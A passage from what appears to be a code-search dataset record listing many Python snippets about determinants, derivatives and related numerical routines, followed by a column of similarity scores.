AM[i][j] - crScaler * 
AM[fd][j]\n\n # Section 3: Once AM is in upper triangle form ...\n product = 1.0\n for i in range(n):\n product *= AM[i][i] # ... product of diagonals is determinant\n\n return product", "def derivative_ex(dirichl_space, neumann_space, ep_in, ep_ex, kappa, operator_assembler):\n phi_id = sparse.identity(dirichl_space, dirichl_space, dirichl_space)\n dph_id = sparse.identity(neumann_space, neumann_space, neumann_space)\n ep = ep_ex/ep_in\n\n dF = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)\n dP = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)\n B = 1/ep * dF - dP\n\n F = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)\n P = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)\n A = F - P\n\n ddF = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)\n ddP = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)\n D = 1/ep * (ddP - ddF)\n\n dF0 = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)\n dP0 = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)\n C = dF0 - 1.0/ep*dP0\n\n A_sys = bempp.api.BlockedOperator(2, 2)\n A_sys[0, 0] = (0.5*(1.0 + (1.0/ep))*phi_id) + B\n A_sys[0, 1] = -A\n A_sys[1, 0] = D\n A_sys[1, 1] = (0.5*(1.0 + (1.0/ep))*dph_id) - C\n\n return A_sys", "def _derivatives(self, state, forces_moments):\n # extract the states\n pn = state.item(0)\n pe = state.item(1)\n pd = state.item(2)\n u = state.item(3)\n v = state.item(4)\n w = state.item(5)\n e0 = state.item(6)\n e1 = state.item(7)\n e2 = state.item(8)\n e3 = state.item(9)\n p = state.item(10)\n q = state.item(11)\n r = state.item(12)\n # extract forces/moments\n fx = forces_moments.item(0)\n fy = forces_moments.item(1)\n fz = forces_moments.item(2)\n l = forces_moments.item(3)\n m = forces_moments.item(4)\n n = forces_moments.item(5)\n\n # position kinematics\n pn_dot =\n pe_dot =\n pd_dot =\n\n # position dynamics\n u_dot =\n v_dot =\n w_dot =\n\n # rotational kinematics\n e0_dot =\n e1_dot =\n e2_dot =\n e3_dot =\n\n # rotatonal dynamics\n p_dot =\n q_dot =\n r_dot = \n\n # collect the derivative of the states\n x_dot = np.array([[pn_dot, pe_dot, pd_dot, u_dot, v_dot, w_dot,\n e0_dot, e1_dot, e2_dot, e3_dot, p_dot, q_dot, r_dot]]).T\n return x_dot", "def DerivMatrixExponential(dG, alpha, S, Sinv, D):\n (n1, n2) = dG.shape\n assert n1 == n2, \"dG is not a square matrix.\"\n n = n1\n assert S.shape == (n, n), 'S does not have the correct dimensions.'\n assert Sinv.shape == (n, n), 'S does not have the correct dimensions.'\n assert D.shape == (n, ), 'D does not have the correct dimensions.'\n assert isinstance(alpha, (int, float)) or alpha.shape == ()\n B = numpy.dot(numpy.dot(Sinv, dG), S)\n expalphaD = numpy.exp(alpha * D)\n V = numpy.ndarray((n, n))\n for x in range(n):\n for y in range(n):\n if x != y:\n V[x, y] = B[x, y] * (expalphaD[x] - expalphaD[y]) / (D[x] - D[y])\n else:\n V[x, y] = B[x, x] * alpha * expalphaD[x]\n return numpy.dot(numpy.dot(S, V), Sinv)", "def derivatives(self):\n self.rdot = self.v\n self.vdot[:,:] = 0.0\n \n for nl in self.nlists: \n nl.separations()\n \n for force in self.forces:\n force.apply()\n\n # Controllers is the new implementation of 
forces\n for controller in self.controllers:\n controller.apply()", "def newton_decent_directions(function, func_derivative, func_hessian, xk, A, P, b, q, t):\r\n # calculate steepest decent direction\r\n newton_dir = -np.dot(np.linalg.inv(func_hessian(x=xk, A=A, P=P, b=b, q=q, t=t)), func_derivative(x=xk, A=A, P=P, b=b, q=q, t=t))\r\n\r\n return newton_dir", "def ddf(self, y1: torch.Tensor, y2: torch.Tensor) -> torch.Tensor:\n out = torch.pow(y1, 2)\n mul = y1 * y2\n mul.exp_()\n\n div = mul.reciprocal()\n div.add_(mul).add_(2)\n out.div_(div)\n return out", "def determinant(x):\n if len(x) == len(x[0]):\n if len(x) == 2:\n return cross_multiply(x)\n else:\n val = 0\n alt = False\n for i in range(len(x)):\n tmp = x[1:]\n t1, t2 = tmp[0][:], tmp[1][:]\n _ = t1.pop(i), t2.pop(i)\n new_t = [t1, t2]\n print(new_t)\n x_multiply = cross_multiply(new_t)\n if val == 0:\n val = x[0][i] * x_multiply\n else:\n if alt:\n val = val + (x[0][i] * x_multiply)\n alt = False\n else:\n val = val - (x[0][i] * x_multiply)\n alt = True\n return val\n else:\n return 'matrix is not a square matrix.'", "def convDerivative(inImage: np.ndarray) -> (np.ndarray, np.ndarray, np.ndarray, np.ndarray):\r\n kernel_x = np.array([[0, 0, 0], [1, 0, -1], [0, 0, 0]])\r\n kernel_y = np.array([[0, 1, 0], [0, 0, 0], [0, -1, 0]])\r\n\r\n # derivative by rows:\r\n Ix = cv2.filter2D(inImage, -1, kernel_x) # , borderType=cv2.BORDER_REPLICATE\r\n\r\n # derivative by columns:\r\n Iy = cv2.filter2D(inImage, -1, kernel_y)\r\n\r\n eps = 0.0000000001\r\n magnitude = pow(Ix ** 2 + Iy ** 2, 0.5)\r\n direction = np.arctan(Iy / (Ix + eps))\r\n\r\n return direction, magnitude, Ix, Iy", "def z_dot_dot(self):\n \n # TODO 1\n # Calculate the vertical component of the acceleration\n # You might find get_thrust_and_moment helpful\n\n c, M_x = self.get_thrust_and_moment()\n phi = self.X[2]\n zdd = (self.g - c * np.cos(phi)) / self.m\n print (zdd)\n return zdd", "def eval_Dxy(self):\n\n return self.Xf - self.Yf", "def derivative(xi, x, y):\n yi = ((xi-x[1])+(xi-x[2]))/((x[0]-x[1])*(x[0]-x[2])) * y[0]\\\n +((xi-x[0])+(xi-x[2]))/((x[1]-x[0])*(x[1]-x[2])) * y[1]\\\n +((xi-x[0])+(xi-x[1]))/((x[2]-x[0])*(x[2]-x[1])) * y[2]\n return yi", "def derivative ( self ):\n return self.__derivative", "def derivative_given_y(self, y):\n\n return np.dot(y, np.subtract(1.0, y))", "def deriv(self, t: float, endBehavior: str = 'halt') -> Vector:\n return self.deriv_state(t,endBehavior)", "def get_bessel_derivative(self):\n return np.array([t.der_bessel for t in self._trc])", "def dK_dtheta(self,X,X2,target):\r\n if X2 is None: X2 = X\r\n FX = np.column_stack([f(X) for f in self.F])\r\n FX2 = np.column_stack([f(X2) for f in self.F])\r\n DER = np.zeros((self.n,self.n,self.n))\r\n for i in range(self.n):\r\n DER[i,i,i] = np.sqrt(self.weights[i])\r\n dw = self.variance * mdot(FX,DER,self.G_1,np.diag(np.sqrt(self.weights)),FX2.T)\r\n dv = mdot(FX,np.diag(np.sqrt(self.weights)),self.G_1,np.diag(np.sqrt(self.weights)),FX2.T)\r\n np.add(target[:,:,0],np.transpose(dv,(0,2,1)), target[:,:,0])\r\n np.add(target[:,:,1:],np.transpose(dw,(0,2,1)), target[:,:,1:])", "def determinant(self):\n if self.m != self.n:\n raise exc.LinearAlgebraError(\"cannot calculate the determinant of\"\n \"a non-square matrix\")\n if self.m == 1:\n return self[0, 0]\n # TODO: can we choose a better row/column to improve efficiency\n return functools.reduce(\n lambda x, y: x ^ y,\n [self[0, j] and\n self.subset([i for i in range(1, self.m)],\n [k for k in range(self.n) if k != j]).determinant\n for j in 
range(self.n)],\n )", "def cayley_menger_det_no_linalg(x2, y2, z2, xb2, yb2, zb2):\n xs = x2 + xb2\n ys = y2 + yb2\n zs = z2 + zb2\n buf1 = ys + zs\n buf1 -= xs\n buf2 = x2 * xb2\n buf1 *= buf2 # buf1 has first term, halved\n np.multiply(y2, yb2, out=buf2)\n buf3 = xs + zs\n buf3 -= ys\n buf2 *= buf3 # buf2 has second term\n buf1 += buf2 # buf1 is sum of two terms, halved\n np.multiply(z2, zb2, out=buf3)\n np.add(xs, ys, out=buf2) # reuse buf2\n buf2 -= zs\n buf3 *= buf2 # buf3 has third term\n buf1 += buf3 # buf1 is sum of 3 first terms, halved\n buf1 *= 2\n np.subtract(x2, xb2, out=buf2)\n np.subtract(y2, yb2, out=buf3)\n buf2 *= buf3\n np.subtract(z2, zb2, out=buf3)\n buf2 *= buf3\n buf1 += buf2 # buf1 is sum of 4 first terms\n np.multiply(xs, ys, out=buf3)\n buf3 *= zs\n buf1 -= buf3\n return buf1", "def derivative(self, cache):\n if self.__activation == 'sig':\n derivative = cache * (1 - cache)\n else:\n derivative = 1 - cache ** 2\n return derivative", "def deriv(self, t: float, endBehavior: str = 'halt') -> RigidTransform:\n res = GeodesicHermiteTrajectory.deriv(self,t,endBehavior)\n return self.to_se3(res[:12])", "def _derivative_(self, x, diff_param=None):\n return 2*exp(-x**2)/sqrt(pi)", "def _det(mat):\n\n return (mat[0][0] * (mat[1][1] * mat[2][2] - mat[1][2] * mat[2][1])\n + mat[0][1] * (mat[1][2] * mat[2][0] - mat[1][0] *\n mat[2][2]) + mat[0][2] * (mat[1][0] * mat[2][1] -\n mat[1][1] * mat[2][0]))", "def convert_deriv_to_inv(J,dpred):\n Jinv = -J /dpred**2\n # That /dpred**2 divides element-wise into every column the matrix via Python's broadcasting.\n return Jinv", "def determinant (self):\n if self.is_square:\n det = 1\n for idx, row in enumerate(echelon_form(self).rows()):\n det *= row[idx]\n return det\n else:\n raise NotImplementedError(\n \"Determinant only defined for square matrices.\")", "def determinant(v,w):\n return v[0] * w[1] - v[1] * w[0]", "def test_exp_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.exp(x/y)\n df_dxdy = lambda x, y: -(x*np.exp(x/y) + y*np.exp(x/y)) / y**3\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2),\n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n df_dxdy(1.5, 2.5))", "def deriv(self, t, x, u):\n \n # unpack some variables\n theta = x[2]\n v = u[0]\n vdiff = u[1]\n\n return np.r_[\n v * cos(theta), \n v * sin(theta), \n vdiff / self.w\n ]", "def det(self):\n if not self.is_endomorphism():\n raise ArithmeticError(\"Matrix morphism must be an endomorphism.\")\n return self.matrix().determinant()", "def d_beta_d_EDOT(self):\n eTheta = self.eTheta()\n a1 = (self.a1()).decompose()\n sinOmg = np.sin(self.omega())\n cosOmg = np.cos(self.omega())\n return a1/c.c*((-eTheta)/np.sqrt(1-eTheta**2)*cosOmg*self.tt0- \\\n (1-eTheta**2)**0.5*sinOmg*self.d_omega_d_par('EDOT'))", "def derivativeY(self, x, y):\n xa = np.asarray(x)\n ya = np.asarray(y)\n return (self._derY(xa.flatten(), ya.flatten())).reshape(xa.shape)", "def determinant(self):\n if self.m != self.n:\n raise exc.LinearAlgebraError(\"cannot calculate the determinant of\"\n \"a non-square matrix\")\n if self.m == 1:\n return self[0, 0]\n # TODO: can we choose a better row/column to improve efficiency\n return sum([self[0, j] * (-1 if j % 2 else 1) *\n self.subset([i for i in range(1, self.m)],\n [k for k in range(self.n) if k != j]).determinant\n for j in 
range(self.n)])", "def derFunc(self,x_vec):\n x=x_vec[0]\n y=x_vec[1]\n z=np.array([2*(self.x_0-x),2*(self.y_0-y)])\n return z*self.sfunc(x,y)", "def calc_formation_enthalpy(ergs_react,erg_prod,coeffs):\n if len(ergs_react) != len(coeffs):\n raise ValueError('len(ergs_react) != len(coeffs)')\n dH = erg_prod\n for i in range(len(ergs_react)):\n ei = ergs_react[i]\n ai = coeffs[i]\n dH -= ai*ei\n dH = -dH\n return dH", "def drag_der(t, params):\n t_final = tf.cast(params['t_final'].get_value(), dtype=tf.float64)\n sigma = tf.cast(params['sigma'].get_value(), dtype=tf.float64)\n norm = (tf.sqrt(2 * np.pi * sigma ** 2)\n * tf.math.erf(t_final / (np.sqrt(8) * sigma))\n - t_final * tf.exp(-t_final ** 2 / (8 * sigma ** 2)))\n offset = tf.exp(-t_final ** 2 / (8 * sigma ** 2))\n der = - 2 * (tf.exp(-(t - t_final / 2) ** 2 / (2 * sigma ** 2)) - offset) \\\n * (np.exp(-(t - t_final / 2) ** 2 / (2 * sigma ** 2))) \\\n * (t - t_final / 2) / sigma ** 2 / norm\n return der", "def eval_with_derivative(self, x):\n z = np.asarray(x)\n y, dydx = self._evalAndDer(z.flatten())\n return y.reshape(z.shape), dydx.reshape(z.shape)", "def diff_effector2(state, th0, alpha, beta, beta_p, p, d):\n dt_state = np.zeros_like(state)\n #print(len(state))\n if alpha == 1:\n for j in range(len(state)):\n if j == 0:\n dt_state[j] = p*beta*th0+2*beta_p*state[-1]-(beta_p+d[\"d_eff\"])*state[j]\n else:\n dt_state[j] = beta_p*state[j-1]- (beta_p+d[\"d_eff\"])*state[j] \n \n else: \n for j in range(len(state)):\n if j == 0:\n dt_state[j] = p*beta*th0 - (beta+d[\"d_prec\"])*state[j] \n elif j < (alpha-1):\n dt_state[j] = beta*state[j-1]-(beta+d[\"d_prec\"])*state[j] \n elif j == (alpha-1):\n # the problem with the 4 and 2 is that since differentiation takes 1 day it should divide twice giving 4 cells\n # however, if it has arrived in the final states if should double every half day\n dt_state[j] = beta*state[j-1]+2*beta_p*state[-1] - (d[\"d_eff\"]+beta_p)*state[j] \n\n else:\n assert j >= alpha\n dt_state[j] = beta_p*state[j-1]- (beta_p+d[\"d_eff\"])*state[j] \n \n return dt_state", "def _derivativeTerm(self):\n\n\t\treturn self._Kd * (self._getErrorFunction() - self._previousError) / self._dt", "def deriv(y, x):\n answer = np.zeros(len(y))\n answer[1:-1] = (y[2:] - y[:-2])/(x[2:] - x[:-2])\n return answer", "def determinant(self):\n det = 0\n # Check if is square\n # 检验其是否是方形矩阵\n if not self.is_square():\n raise(ValueError, \"Cannot calculate determinant of non-square matrix.\")\n if self.h > 2:\n raise(ValueError, \"Calculating determinant not implement for matrices largerer than 2x2\")\n\n # TODO - your code here\n\n # 这里仅实现了获取1x1 2x2 矩阵的det值\n # For Matrix 1x1\n if (self.h * self.w) == 1:\n det = self.grid[0][0]\n # For Matrix 2x2\n elif self.h == 2 & self.w == 2:\n det = self.g[1][1] * self.g[0][0] - self.g[0][1] * self.g[1][0]\n # In the future could implement determinant for matrix bigger\n else:\n raise(NotImplementedError, \"Calculating determinant not implement for matrices largerer than 2x2.\")\n return det", "def _compute_diag_H(self, t, index, update_derivatives=False, stationary=False):\r\n\r\n \"\"\"if delta_i~=delta_j:\r\n [h, dh_dD_i, dh_dD_j, dh_dsigma] = np.diag(simComputeH(t, index, t, index, update_derivatives=True, stationary=self.is_stationary))\r\n else:\r\n Decay = self.decay[index]\r\n if self.delay is not None:\r\n t = t - self.delay[index]\r\n \r\n t_squared = t*t\r\n half_sigma_decay = 0.5*self.sigma*Decay\r\n [ln_part_1, sign1] = ln_diff_erfs(half_sigma_decay + t/self.sigma,\r\n half_sigma_decay)\r\n 
\r\n [ln_part_2, sign2] = ln_diff_erfs(half_sigma_decay,\r\n half_sigma_decay - t/self.sigma)\r\n \r\n h = (sign1*np.exp(half_sigma_decay*half_sigma_decay\r\n + ln_part_1\r\n - log(Decay + D_j)) \r\n - sign2*np.exp(half_sigma_decay*half_sigma_decay\r\n - (Decay + D_j)*t\r\n + ln_part_2 \r\n - log(Decay + D_j)))\r\n \r\n sigma2 = self.sigma*self.sigma\r\n\r\n if update_derivatives:\r\n \r\n dh_dD_i = ((0.5*Decay*sigma2*(Decay + D_j)-1)*h \r\n + t*sign2*np.exp(\r\n half_sigma_decay*half_sigma_decay-(Decay+D_j)*t + ln_part_2\r\n )\r\n + self.sigma/np.sqrt(np.pi)*\r\n (-1 + np.exp(-t_squared/sigma2-Decay*t)\r\n + np.exp(-t_squared/sigma2-D_j*t)\r\n - np.exp(-(Decay + D_j)*t)))\r\n \r\n dh_dD_i = (dh_dD_i/(Decay+D_j)).real\r\n \r\n \r\n \r\n dh_dD_j = (t*sign2*np.exp(\r\n half_sigma_decay*half_sigma_decay-(Decay + D_j)*t+ln_part_2\r\n )\r\n -h)\r\n dh_dD_j = (dh_dD_j/(Decay + D_j)).real\r\n\r\n dh_dsigma = 0.5*Decay*Decay*self.sigma*h \\\r\n + 2/(np.sqrt(np.pi)*(Decay+D_j))\\\r\n *((-Decay/2) \\\r\n + (-t/sigma2+Decay/2)*np.exp(-t_squared/sigma2 - Decay*t) \\\r\n - (-t/sigma2-Decay/2)*np.exp(-t_squared/sigma2 - D_j*t) \\\r\n - Decay/2*np.exp(-(Decay+D_j)*t))\"\"\"\r\n pass", "def calc_det(m):\n det = m[0][0] * m [1][1] - (m[0][1] * m[1][0])\n return det", "def det(a, b, c):\n d = (b[0]*c[1]-c[0]*b[1])+(c[0]*a[1]-a[0]*c[1])+(a[0]*b[1]-a[1]*b[0])\n return d", "def _der(self, x):\n y, dydx = self._evalAndDer(x)\n return dydx # Sadly, this is the fastest / most convenient way...", "def _der(self, x):\n y, dydx = self._evalAndDer(x)\n return dydx # Sadly, this is the fastest / most convenient way...", "def determinant(self):\n if self.cols != self.rows:\n raise Exception ('Matrix is not square!')\n for i in range(self.rows):\n if self.values[i][i] == 0:\n raise Exception ('There is zero on the main diagonal')\n #TODO: Rearrange the lines, that the main diagonal don't have a zero values \n\n arr = self.values[:]\n for i in range(self.rows):\n for j in range(self.cols):\n diag = [arr[l][p] for p in range(self.cols) for l in range(self.rows) if l == p ]\n if i > j :\n arr2 = arr[i][j]/diag[j]\n arr1 = [round(x * arr2, 4) for x in arr[i-i+j]]\n arr[i] = map(lambda x,y: round(x - y, 4) , arr[i], arr1 )\n\n diag = [arr[l][p] for p in range(self.cols) for l in range(self.rows) if l == p ]\n det = 1\n for i in range(len(diag)):\n det *= diag[i]\n if det != 0 :\n return True\n else:\n return False", "def test_tan_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.tan(x/y)\n df_dxdy = lambda x, y: -(y/np.cos(x/y)**2 + 2*x*np.tan(x/y)/np.cos(x/y)**2) / y**3\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2),\n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n df_dxdy(1.5, 2.5))", "def d_dx(self, points):\n dk_dx = np.zeros((points.shape[0] + 3, # i\n self.source.n_points, # k\n self.source.n_dims)) # l\n dk_dx[:-3, :] = self.kernel.d_dl(points)\n\n affine_derivative = np.array([[0, 0],\n [1, 0],\n [0, 1]])\n dk_dx[-3:, :] = affine_derivative[:, None]\n\n return np.einsum('ij, ikl -> klj', self.coefficients, dk_dx)" ]
[ "0.65636075", "0.6383123", "0.6320185", "0.6274132", "0.62254035", "0.6178101", "0.6175668", "0.6127627", "0.61223304", "0.61122054", "0.61108375", "0.60562176", "0.60325277", "0.6020855", "0.6019261", "0.6014277", "0.60129786", "0.60129786", "0.5989726", "0.59852016", "0.5982169", "0.59668463", "0.5935284", "0.59349674", "0.5933779", "0.5933281", "0.5933101", "0.5911815", "0.5894086", "0.5894086", "0.5883208", "0.5869818", "0.58537215", "0.5836323", "0.5817557", "0.581707", "0.579404", "0.57888615", "0.5774369", "0.57635266", "0.5742327", "0.57311964", "0.57257175", "0.5722962", "0.57120943", "0.5675959", "0.5674093", "0.5658675", "0.56448984", "0.5641573", "0.56340295", "0.5609833", "0.5601637", "0.5592169", "0.55877805", "0.55849713", "0.558355", "0.55789673", "0.55731833", "0.5572312", "0.55698544", "0.5568967", "0.55648446", "0.5562865", "0.5562257", "0.5552044", "0.5550566", "0.55479234", "0.55436414", "0.5526952", "0.55267024", "0.55226564", "0.55198276", "0.5518883", "0.55132955", "0.55126935", "0.5494363", "0.54918087", "0.54842645", "0.547967", "0.5474578", "0.546754", "0.5464515", "0.5463656", "0.5462883", "0.54595226", "0.54581445", "0.54516685", "0.5442006", "0.5440408", "0.5439934", "0.5437737", "0.5435537", "0.5433428", "0.5431702", "0.54278725", "0.54278725", "0.5425724", "0.54199255", "0.5413294" ]
0.6529994
1
Compute pdf at a fixed point on the support.
def pdf(x):
    return lambda point: self.information_manifold.point_to_pdf(point)(x)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pdf(x, point):\n raise NotImplementedError(\"The pdf method has not yet been implemented.\")", "def pdf(self, x):\n raise NotImplementedError", "def pdf(self,x):\n returnPdf = self._distribution.pdf(x)\n return returnPdf", "def pdf(self,x):\n if self.base == 'natural':\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x\n else:\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x * 1./math.log(10.)\n return pdfValue", "def pdf(self,x):\n pdfValue = self.pdfFunc(x)\n return pdfValue", "def pdf(self,x):\n if self.transformation:\n pdfValue = self.pdfInTransformedSpace(x)\n else:\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfValue = self._distribution.pdf(coordinate)\n return pdfValue", "def pdf(self, grid, dataSegment):\n temp = grid[0][:] # make copy of parameter grid\n temp[temp > 1.] = 0. # p < 1\n temp[temp < 0.] = 0. # p > 0\n\n if dataSegment[0]:\n pass # pdf = p\n else:\n temp = 1. - temp # pdf = 1 - p\n\n return temp", "def _compute_single_pdf(self, **kwargs):\n raise NotImplementedError", "def pdf(self, x):\n\t\treturn 1.5 * np.power(x,2) ##obtained after finding z from integrating x^2 from -1 to 1", "def pdf(self, grid, dataSegment):\n return np.exp(\n -((dataSegment[0] - grid[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(2. * np.pi * grid[1] ** 2.))", "def pdf(self,x):\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfValue = self._distribution.pdf(coordinate)\n return pdfValue", "def pdf(self,x):\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfValue = self._distribution.pdf(coordinate)\n return pdfValue", "def c_pdf(self, x):\n\n assert x > 0\n\n # shortcut\n shape = self.shape\n loc = self.loc\n scale = self.scale\n xn = np.subtract(x, loc) / scale\n\n # update x\n ft = shape * xn ** (shape - 1) * np.exp(-xn ** shape)\n return ft / scale", "def pdf(self, grid, dataSegment):\n return np.exp(-((dataSegment[0, 0] - grid[0]) ** 2.) / (2. * dataSegment[0, 1] ** 2.) -\n .5 * np.log(2. * np.pi * dataSegment[0, 1] ** 2.))", "def pdf(self, grid, dataSegment):\n return np.exp(-(dataSegment[0] ** 2.) / (2. * grid[0] ** 2.) - .5 * np.log(2. * np.pi * grid[0] ** 2.))", "def pdf(self, grid, dataSegment):\n return np.exp(-((dataSegment[1] - grid[0] * dataSegment[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(\n 2. 
* np.pi * grid[1] ** 2.))", "def pdf(self, grid, dataSegment):\n return (grid[0] ** dataSegment[0]) * (np.exp(-grid[0])) / (np.math.factorial(dataSegment[0]))", "def pdf(self, grid, dataSegment):\n # create dictionary from list\n freeParameterDict = {key: value for key, value in zip(self.freeParameters, grid)}\n\n # merge free/fixed parameter dictionaries\n parameterDict = freeParameterDict.copy()\n parameterDict.update(self.fixedParameterDict)\n\n # scipy.stats differentiates between 'pdf' and 'pmf' for continuous and discrete variables, respectively\n if self.isContinuous:\n return self.rv.pdf(dataSegment[0], **parameterDict)\n else:\n return self.rv.pmf(dataSegment[0], **parameterDict)", "def pdf(self, grid, dataSegment):\n return self.density(dataSegment[0], *grid)", "def pdf(self, point: np.ndarray) -> float:\n return self._probs.dot([rv.pdf(point) for rv in self._rvs])", "def pdf(self, x, **kwargs):\n from scipy.stats import rv_continuous\n return self.rvdist.pdf(x, **kwargs) if rv_continuous in self.rvdist.__class__.__mro__ \\\n else self.rvdist.evaluate(x, **kwargs)", "def pdf(self, grid, dataSegment):\n r = grid[0]\n s = grid[1]\n sScaled = s*np.sqrt(1 - r**2.)\n return np.exp(-((dataSegment[1] - r * dataSegment[0]) ** 2.) / (2. * sScaled ** 2.) - .5 * np.log(\n 2. * np.pi * sScaled ** 2.))", "def point_to_pdf(self, point):\n geomstats.errors.check_belongs(point, self)\n point = gs.to_ndarray(point, to_ndim=2)\n return lambda x: self.pdf(x, point)", "def pdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.pdf_link(link_f, y, extra_data=extra_data)", "def pdf(self, value=None):\n if value is None:\n value = self.value\n return self.rv.pdf(\n value, *self._pymc_dists_to_value(self.args), **self.kwds\n )", "def pdf(self, x):\n theta = np.zeros(self.p)\n theta[:2] = x\n return self.prior.pdf(theta)*self.likelihood(theta)", "def pdfPR(self,x,p,r):\n\t\treturn gammaF(x + r) / (factorial(x)*gammaF(r)) * p**r * (1-p)**x", "def pdf(self, x):\n\n mean = self.mean\n stddev = self.stddev\n e = 2.7182818285\n pi = 3.1415926536\n\n exp = -1 * ((x - mean) ** 2) / (2 * (stddev ** 2))\n den = 2 * pi * (stddev ** 2)\n\n pdf = (1 / (den) ** 0.5) * (e ** exp)\n\n return pdf", "def pdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (x**(-self.alpha-1))*np.exp(-(self.beta/float(x)))", "def get_pdf(self, points=None):\n if points is not None:\n return self.parent.pdf(points)\n else:\n raise ValueError( 'Please digit an input for getPDF method')", "def pdf(self,x):\n if x in self.values:\n pdfValue = self.mapping[x]\n else:\n if self.isFloat:\n vals = sorted(list(self.values))\n idx = bisect.bisect(vals, x)\n pdfValue = self.mapping[list(vals)[idx]]\n else:\n self.raiseAnError(IOError,'Categorical distribution cannot calculate pdf for ' + str(x))\n return pdfValue", "def pdf(self, x, *args, **kwds):\n args, loc, scale = self._parse_args(*args, **kwds)\n x, loc, scale = map(np.asarray, (x, loc, scale))\n args = tuple(map(np.asarray, args))\n dtyp = np.find_common_type([x.dtype, np.float64], [])\n x = np.asarray((x - loc) / scale, dtype=dtyp)\n cond0 = self._argcheck(*args) & (scale > 0)\n cond1 = self._support_mask(x) & (scale > 0)\n cond = cond0 & cond1\n output = np.zeros(np.shape(cond), dtyp)\n np.putmask(output, (1 - cond0) + np.isnan(x), self.badvalue)\n if np.any(cond):\n goodargs = argsreduce(cond, *((x,) + args + (scale,)))\n s, goodargs = goodargs[-1], goodargs[:-1]\n # use trapezoidal integration rule to estimate normalization 
factor\n # # end = (np.max(x) + np.max(goodargs[1]) + 2 * np.max(goodargs[2]) + 1) * 4\n #\n # end = np.max([np.max(x) + np.max(goodargs[2]), 1000])\n # num_segments = int(end * 1.666)\n # r = np.linspace(self.a + 1e-07,\n # end,\n # num_segments)\n # norm_scale = np.array([scale[0]] * num_segments)\n # norm_args = [np.array([arg[0]] * num_segments) for arg in goodargs]\n # len_scale = len(scale)\n # scale = norm_scale * np.trapz(self._pdf(r, *norm_args[1:]), r)[:len_scale]\n mu = goodargs[1]\n b = goodargs[2]\n s = 1 - 0.5 * np.exp((0 - mu) / b)\n np.place(output, cond, self._pdf(*goodargs) / s)\n if output.ndim == 0:\n return output[()]\n return output", "def tabulate_pdf(self):\n\n from mitsuba.core import Float, Vector2f, ScalarVector2f\n\n extents = self.bounds.extents()\n endpoint = self.bounds.max - extents / ScalarVector2f(self.res)\n\n # Compute a set of nodes where the PDF should be evaluated\n x, y = ek.meshgrid(\n ek.linspace(Float, self.bounds.min.x, endpoint.x, self.res.x),\n ek.linspace(Float, self.bounds.min.y, endpoint.y, self.res.y)\n )\n\n endpoint = extents / ScalarVector2f(self.res)\n eps = 1e-4\n nx = ek.linspace(Float, eps, endpoint.x * (1 - eps), self.ires)\n ny = ek.linspace(Float, eps, endpoint.y * (1 - eps), self.ires)\n wx = [1 / (self.ires - 1)] * self.ires\n wy = [1 / (self.ires - 1)] * self.ires\n wx[0] = wx[-1] = wx[0] * .5\n wy[0] = wy[-1] = wy[0] * .5\n\n integral = 0\n\n self.histogram_start = time.time()\n for yi, dy in enumerate(ny):\n for xi, dx in enumerate(nx):\n xy = self.domain.map_forward(Vector2f(x + dx, y + dy))\n pdf = self.pdf_func(xy)\n integral = ek.fmadd(pdf, wx[xi] * wy[yi], integral)\n self.histogram_end = time.time()\n\n self.pdf = integral * (ek.hprod(extents / ScalarVector2f(self.res))\n * self.sample_count)\n\n # A few sanity checks\n pdf_min = ek.hmin(self.pdf) / self.sample_count\n if not pdf_min >= 0:\n self._log('Failure: Encountered a cell with a '\n 'negative PDF value: %f' % pdf_min)\n self.fail = True\n\n self.pdf_sum = ek.hsum(self.pdf) / self.sample_count\n if self.pdf_sum > 1.1:\n self._log('Failure: PDF integrates to a value greater '\n 'than 1.0: %f' % self.pdf_sum)\n self.fail = True", "def _evaluate_point_logpdf(args):\n x, data, cho_factor = args\n\n # Use Cholesky decomposition to avoid direct inversion of covariance matrix\n diff = data - x\n tdiff = la.cho_solve(cho_factor, diff.T, check_finite=False).T\n diff *= tdiff\n\n # Work in the log to avoid large numbers\n return logsumexp(-np.sum(diff, axis=1)/2.0)", "def poisson_pdf(x, u, log=False):\n #return np.exp(-u)*(u**x)/factorial(x)\n #return np.exp(-u)*(u**x)/gamma(x+1)\n if log:\n return poisson.logpmf(x, u)\n return poisson.pmf(x, u)", "def pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a 